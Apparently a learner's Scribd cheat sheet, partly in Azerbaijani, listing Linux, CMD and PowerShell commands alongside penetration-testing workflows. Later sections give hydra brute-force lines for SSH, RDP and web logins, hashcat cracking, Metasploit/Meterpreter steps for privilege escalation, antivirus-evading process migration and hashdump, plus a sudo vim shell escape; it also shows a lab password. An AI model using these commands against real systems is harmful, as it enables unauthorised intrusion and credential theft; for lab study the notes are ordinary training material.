Scribd
Upload
22 views10 pages

Linux Cmds

This document is a comprehensive guide to various Linux commands and their functionalities, including file management, user management, network commands, and system operations. It also covers tools for penetration testing, such as Nmap, Metasploit, and Hydra, along with examples of their usage. Additionally, it provides insights into privilege escalation techniques and network monitoring with Snort and Bettercap.

Uploaded by

familbnb00
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
22 views10 pages

Linux Cmds

This document is a comprehensive guide to various Linux commands and their functionalities, including file management, user management, network commands, and system operations. It also covers tools for penetration testing, such as Nmap, Metasploit, and Hydra, along with examples of their usage. Additionally, it provides insights into privilege escalation techniques and network monitoring with Snort and Bettercap.

Uploaded by

familbnb00
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

~/home/kali.

/ - Root

(Ayrı qovluqdu)~ =kali

Us: kali Pass: ejgfb5

Linux cmds
Ctrl+Shift+ “++” -Böyüt şrifti
Sol Cntrl L * Clear everything clear *Sil

Undo full screen- Right Ctrl+F

git clone “https path” *Download from GitHub

sudo ./filepath *Run the executable files or scripts

apt-get update.. * Update Linux. apt-get install.. *İnstall program

whoami * Current username

display * Display images (install imagemagick)

Dirbuster *Brute force directories and files in URL

cd /usr/share/wordlists; hydra -l test -P [Link] rdp://ip address

xdg-open file *Open image from the terminal

ls * List folders +Directory= list the content

date* exit* Terminal

pwd * Print working directory(olduğun qovluq)

ip addr * Show IP.

cd .. * Change directory (arxa qovluğa qayıdır)

cd * Go Home directory

Tab * Cmd tamamlayan

nl *Number lines

touch. *Create File ; mkdir * Make directory;

rmdir * Remove directory

ls -la * Long list all(qabaqda "." olanlar ls-də görünməyən filelerdır)

man Ls * Cmdlara manual help baxmaq;ls --help

ssh username@yourIP -p 2222 *Remote control for port 2222


echo Hi > [Link] * Filea 'hi' yazır. ""no need

>> Bir dənədən fərqli olaraq Replace eləmir

rm * Remove file, +) Dir/File

cp +file+Dir. destination qoy *Copy file

cp -r *dest+ source dir. Copy dir to another

cat file1>>file2 *Copy files without overwrite

mv * Move,Rename file,dir + directory

Ex: mv old_name new_name

Up arrow * Previous cmds

passwd * Change password

sudo passwd user1 - change other user pswd

-1 * List content on 1 column

-r * Display in Reverse order

-l *Long list (+File SIZE,Access{-l -h}human frm)

-d * Show directory content

-s * Sort directory content by Size

-p *parent directory

cat * Fayl açmaq(.txt) E: cat dir8/[Link]

mousepad = cat *But in a GUI

tar -xvf *Open .tar files

-r * Recursive E: cp -r İçindəki kontenti də copy

&& - Execute 2nd command yanbayan

& - Lets cmd run in the background if take long

unzip [Link] -d mydirec *unzip file and move to mydirec directory

bzip2 * +dir Compress directory to .bz2

find -name *.txt- file, dir tapmaq(* yeri adı yaz)

(e)grep "word"- +[Link] *Fileda söz tap(not dir.)

Square bracket-RANGE: m[a-d]m, m[a,s,d]m

Curly bracket-; mkdir {folder1,folder2}


mkdir dir{1..100} *100 qovluq yarat

mkdir -p dir4/dir5 in *-p in case no parent dir.

rm -r dir{1..100} *100 dir sil

rmdir *remove empty directory(error if not emp)

rm -r *directory və içindəkilər; mkdir dir1/FM

sudo su -l name *Switch user to root

man ls; ls --help *sonrakıları göstər

file +name * Type of the file

su -l (login) *+user, switch user(old user home [Link]ə qalmır)

/etc - directory where OS files are located

/var -Frequently accessed variable data:tmp,log files,backups

/tmp * Temporary directory;Qaralama;Restartda gedir

/etc/shadow – Encrypted user Passwords directory

/etc/passwd *Show users and shells

/etc/group * Show groups

1)python3 -m [Link] 8000 *Start a webserver in an empty port

2)wget [Link] -P /tmp/ *Download files from web to tmp dir to avoid sudo if we are
in root

3)chmod +x [Link] *Make script files executable

wc -w *word -l *lines -c *bytes count

nano filename * Edit text file or Create a file

ctrl = "^" in text editor

Local to Remote(Src to dstn) Secure Copy-

scp filename user@ip:/filelocation/newname

Remote to local-

scp user@ip:filelocation newname

kill (PID number) *kill command

Q=exit. PID=0 System boot

systemctl start(stop,enable,dis..) servicename


Ex: echo "hi tim" &=Ctrl+Z *Run in the background(e:copy)

fg *back to Foreground

crontab -e *Edit schedule

/var/log *Logs; ufw-firewall logs;fail- bruteforce

access and error logs inside */var/log/apache2

less *Ekranda hər şeyi yox, lazım olanı göstərir

add-apt-repository /etc/apt OS repositories

wget -qO -url | sudo apt-key add -

touch fl+ add to the fl; apt update; apt install fl

[a-c]zz * azz, bzz, czz; [a-cx-z]zz *azz,bzz,czz,xzz,yzz,zzz

[a-zA-Z] ; file [1-3]; [^k]ing *exclude “k”. ring not king

[^a-c] NOT -bat,cat; but fat, hat is okay

[abc] -abc,cba,ca

. *Any Single character “.at” -cat, fat, hat, rat

'\’ +char *Escape char. For literal dot FE: a\.c = a.c
? * Optional character : abc? – ab or abc. ‘c’ is optional

* Zero or more times: cats*= cat,catsss; a*f= acf,awerf

+ *One or more times kali + = kali tools

Grep -E ‘e+' [Link] red,reef,reeed

\d *Digit \D *Non-Digit

\w *Alphanumeric: a, 3 etc. \W *Non-alpha : !, #

\s *Whitespace (space,newline). \S *Alpha+ Symbols

{12} * 12 times. {1,5} *1 to 5 times. {2,} *2 or more

^ *Starts with(not in [^exclude]) $ *Ends with

^abc *Starts with abc. xyz$ *Ends with xyz

^a.*r$ *Starts with ‘a’ ends with ‘r’

^...$ *3 hərfli

During the (day|night) - ~the day or ~ the night


updatedb *Update database if new doesn’t come up

chmod +rwx *+File Change Permission on the file

chmod 777 *Everybody full permission (owner,group member,user)

sudo useradd -g blue -G purple -s /bin/bash ME

sudo adduser(useradd,addgroup) name *Adds user

sudo userdel john

grep ‘sudo’ /etc/group *See users in the “sudo” group & who can use sudo

du -ah /home/ * Disk usage- list folders in size (-a= all files)

du -c *Total size folders. du –time *Last modified

egrep = grep -e *Mention multiple patterns *include regex in string””

grep -F = fgrep *Search Fixed meaning not regex

grep *Search basic and fixed. egrep *Extended regex

grep -v *Not containing the pattern. -R *Recursive+files

grep -i *Search pattern while IGNORING the CASE

tr -s (translate;squeeze) *REPLACE the REPEATED source CHARACTER(not Word) SETS with destination
set. Ex: cat [Link] | tr -s '[a-z] '[A-Z] *kiçik hərfləri böyüyə keçirtdi. tr -s ' ' *Delete EXTRA spaces

tr -d '+set' *Delete Source set Characters

tr-d ‘character’ <[Link]>[Link] *Sözü silib yeni fayl

[:digit:] *Rəqəmləri seç

[a-zA-Z] *Bütün hərfləri seç

awk ‘{print}' = cat awk '/ctf/' [Link] *Search “ctf”

awk '{print $1,$3}' [Link] *Hər sətirdəki 1,3cü sözü Cat

awk '{print NR,$0}' [Link] *Number(records) the lines

$0 =All line. Fields- hər field seperatordan öncə və sonra

awk ‘BEGIN{FS=”o”} {print $1,$3} END{print “TOTAL ROWS= “ NR}' [Link] *Field seperatoru “o” hərfi
nəzərə alaraq 1və 3üncü fieldləri + sonda ümumi sıra sayını listele

sort *Sort alphabetically sort -n -r *Numerically; Reversely(Böyük ədəddən Kiçiyə)

sort -o [Link] *Save into a output file

uniq *Unique olanları göstərir(eliminate duplicate lines(only neighbours not uzaq).


Sort | uniq *Sort alphabetically then eliminate duplicates

uniq -c *Count the occurrence of each line in file

uniq -d *Show repeated ones uniq -u *Show only unique lines

head -n 2271 [Link] *Filedakı 2271ci line-ı göstərir axırıncı

cut -d “:” -f 1 *Delimiter is colon, and we Take the first field(for brute force in /etc/passwd)

cat -n *Nömrələ lineları

env *Show variables and Path which may have a script language

ifconfig *Show network interfaces, ip etc.

netstat -at or au * List connections, tcp or udp protocols. netstat -s *Statistics

pdfinfo [Link] *Get info about pdf(author etc, time etc)

sudo apt install poppler-utils *Install the upper cmd to kali

exiftool [Link] * Gps, Camera model (replace deg with '°’ paste in google or bing maps)

sudo apt install libimage-exiftool-perl *Install the upper cmd

ftp (ip address) * Connect to open ftp port

get file (+ new name u want) *Download from the open ftp server

sha256sum file – Make sha256 hash of the file

md5sum file - Make hash

echo “code” | base64 -d. *Decode base64

sudo su - Convert to root

find / -iname “filename” 2>dev/null *Find path to file from the root(ignore case), Don’t specify path

find . -name [Link] *Find the file in current dir.

Find / -type f -perm 0777 * Find files with 777 permissions (-type d *directory)

Find / -size +100M. *Find files +100 mb

Cat /etc/issue *See linux version cat /proc /version *Target system process

netdiscover -r *Find ip addresses

hashcat -O -m 20 --show salted hash /usr/share/wordlists/[Link] *Optimize for kernel, -m Choose


the hash version number(check hashcat help) and show cracked password

gobuster dir -u 10.10.. -w wordlist/path

hydra -l username -P passwordlist/path -t 6 (ip)10.10. ssh (or- [Link] *Brute force ssh password
hydra -l username -P [Link] [Link](slashsiz) http-post-form
“/login:user=^USER^&pass=^PASS^:invalid” *Use hydra for login Pages

crunch 7 9 (min-max word length) abc6543(strings to use) * Make wordlist

Nmap

nmap -F -A -sN -T4 -sC (ip address..) *Scan for open ports Fast(known ports) and All including Versions(-
sV), scan network and then provide ip, Default scan(-sC)

nmap -sV -vv -sC –script vuln -sS *Version scan, Verbose, Script scan for finding vulnerability, Syn scan(-
sS stealthy one for evasion)

İf port 80(http) or 443(https) is open then means there’s a web server running, mostly website hosting
under different /(slash)s

Check for web application versions under websites

Searchsploit (Exploit database)

searchsploit --cve 2019-9053 (ornamexploit) *Search for the exploit from exploit-db

searchsploit -m file path *To download(mirror) exploit to your machine

python3 /usr/share/exploitdb/exploits/(searchsploit file location) [Link] *Exploit

Metasploit (after nmap and gobuster)

Msfconsole *Start Metasploit

search (name) *Search the name of the vulnerability from nmap

use (number) *Select the exploit

back *To exit from the wrong exploit

show options *See what’s required or not

set (RHOSTS) ip *Set the required value

Ctrl Z or background *Background the session

Search shell_to meterpreter and Use 0. + show options

set session id + sessions

session (-i) id *Choose the meterpreter session to convert + run


Meterpreter: 1)getsystem *check to confirm u escalated, 2)shell *open dos shell,show file path for
Windows or any OS 3)whoami, 4)(afterCtrlZ) ps 5)migrate Pidnumber *Migrate to Authority System
processes to evade antivirus, [Link] etc. 6) hashdump * Extract password hashes from
Windows(migrate to other sys process if not work)

(1) search -f file(path copy paste eliyəndə 2 //li elə tab-la, manual bir yox) 2)? *Help 4)dir *Listele for
windows 5)type=more *See the content cat 7)getuid *See privileges 9) sessions -i idnumber *Get back
to session 10) cat “pathtofile” *Use dırnaqs for windows path in linux 11) sysinfo -comp,os name 12)pwd
13) cd ../../ 14)

Privilege Escalation

Use linux exploit suggester

Sudo vim -c ‘:!/bin/sh’. *Change to vim editor command shell; in VIM Press “Esc” to back to normal.
And Press “:!cmd” to execute cmds

Sudo -l *See your privileges ; Also try to check other users in home directory

Go to [Link] and look for the binaries u can escalate after sudo -l

find / -perm -4000 2>/dev/null *Find files that have suid permission & removeerror(2>device/null)

Enumeration:

Hostname *Check the name of machine(usually OS version)

Uname -a *info about kernel

Ps -axjf *View process tree

Ps aux * All users processes and who launched it

Ps aux | grep -v tty *Don’t show the process attached to terminal in other words show background
processes

Id *+name Show özünün ya da başqasının hansı grupa vı user idsi. Root olub olmadığını da check

History * See history

gedit [Link] * Edit Snort rules

sudo snort -X(similar -dev)(read snort. Files as raw data-hex+ascii, specify -r or -c together) -d(logger
mode-output all packets) -A full(create alerts) -c(specify rules) -r (read pcaps,snorts) -T(test config
rules,specify -c) -l . (output to the current directory)

IPS mode: sudo snort -c file -q -Q –daq afpacket -i eth0:eth1 -A full


sudo snort -r [Link] ‘port 22’ - Filter port 22 in snort file

etc/snort/rules/[Link]

tail |head file *Extract the last |first 10 lines from the file

route=ip -r *See the routing table(and who are you on the network with by slash)

ip -a *See your ips on the network

iwconfig *See wireless

service apache2 start *Start an apache server

Bettercap:

1st cmd : bettercap

[Link] on *Scan devices on the network. [Link] *See devicesğ

CMD:
ipconfig /? *See Help Manual

cls *Clean screen

net user (username) *See users. Their groups and last logon for ( )

color 2,3,4 dir/s

arp -a *See the ip and macs accordingly on the same network

Powershell: (Verb-Noun)
Cd C:\

Get-Command; Get-alias(different) *See cmdlets

Get-Command Verb-* or Get-Command *-Noun(regex)

Get-Help command-name *Get help

Get-Service |Where-Object -Property Status -eq Stopped *Get Processes equal to stopped

ls -Path C:/ -Include *[Link]* -File -R -ErrorAction Silently Continue * Find files(not directory)

Get-Content “C:\..” *Cat files

Get-Filehash -Algorithm md5 FİLEPATH

Get-Childitem | Select Object -Property Mode,Name


set-location c:\ = cd\ *C diskinə aparır;

Get-childitem = dir=ls *listlə

Set-childitem. *cd kimi change directory

Get-location *pwd olduğun directory

Copy-item *cp

New-item [Link] * Create a file

echo "smth"

Remove item=rm=rmdir=del=rd

clear = cls *sil

notepad, calc- calculator, mspaint,

ipconfig /all

Get-Help(Command) *resolve*

You might also like